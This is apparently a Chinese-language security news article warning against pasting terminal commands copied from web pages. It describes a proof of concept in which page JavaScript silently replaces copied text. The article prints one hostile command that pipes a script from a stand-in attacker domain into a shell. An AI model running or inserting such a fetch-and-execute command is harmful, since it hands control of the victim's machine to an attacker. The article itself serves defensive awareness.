圈小蛙

不要从网页复制粘贴命令——你可能会被黑

程序员、系统管理员、安全研究人员和技术爱好者习惯将网页中的命令复制粘贴到控制台或终端中,但他们被警告说他们的系统可能会受到威胁。

技术专家演示了一个简单的技巧,可以让您在从网页复制和粘贴文本之前三思而后行。

剪贴板上的后门?

最近,安全意识培训平台Wizer的创始人加布里埃尔·弗里德兰德(Gabriel Friedlander)展示了一个明显但令人惊讶的黑客行为,它会让您对从网页复制粘贴命令持谨慎态度。

对于新手和熟练的开发人员来说,从网页(ahem、StackOverflow)复制常用命令并将它们粘贴到他们的应用程序、Windows命令提示符或Linux终端中并不罕见。

但弗里德兰德警告说,网页可能会暗中替换剪贴板上的内容,而最终复制到剪贴板上的内容与您打算复制的内容大不相同。

更糟糕的是,如果没有仔细的分析,开发人员可能只有在粘贴文本后才意识到他们的错误,此时可能为时已晚。

在他的博客上发布的简单概念证明(PoC)中,弗里德兰德要求读者复制大多数系统管理员和开发人员都熟悉的简单命令。

弗里德兰德的HTML页面,带有一个可以复制到剪贴板的简单命令。但是,当将您从弗里德兰德的博客中复制的内容粘贴到文本框或记事本中,结果可能会让您感到惊讶:

curl http://attacker-domain:8000/shell.sh | sh

您不仅会在剪贴板上看到一个完全不同的命令,而且更糟糕的是,它的末尾还有一个换行(或回车)字符。

这意味着上面的示例将在直接粘贴到Linux终端后立即执行。

粘贴文本的人可能认为他们正在复制熟悉的、无害的命令sudo apt update,该命令用于获取系统上安装的软件的更新信息。

但事实并非如此。

这是什么原因造成的?

神奇之处在于隐藏在弗里德兰德设置的PoC HTML页面后面的JavaScript代码。

只要您复制HTML元素中包含的“sudo apt update”文本,下面显示的代码片段就会运行。

之后发生的是JavaScript的“事件监听器”捕获复制事件并用弗里德兰德的恶意测试代码替换剪贴板数据。

请注意,事件侦听器在JavaScript中有多种合法用例,但这只是它们可能被误用的一个示例。

“这就是为什么你永远不应该将粘贴命令直接复制到你的终端中,”弗里德兰德警告说。

“你认为你在复制一件事,但它被其他东西取代,比如恶意代码。只需将一行代码注入你复制的代码中,就可以为你的应用程序创建一个后门。”

“这次攻击很简单,但也很有害。”

一个简单的,但也是日常安全的重要一课。

Exit mobile version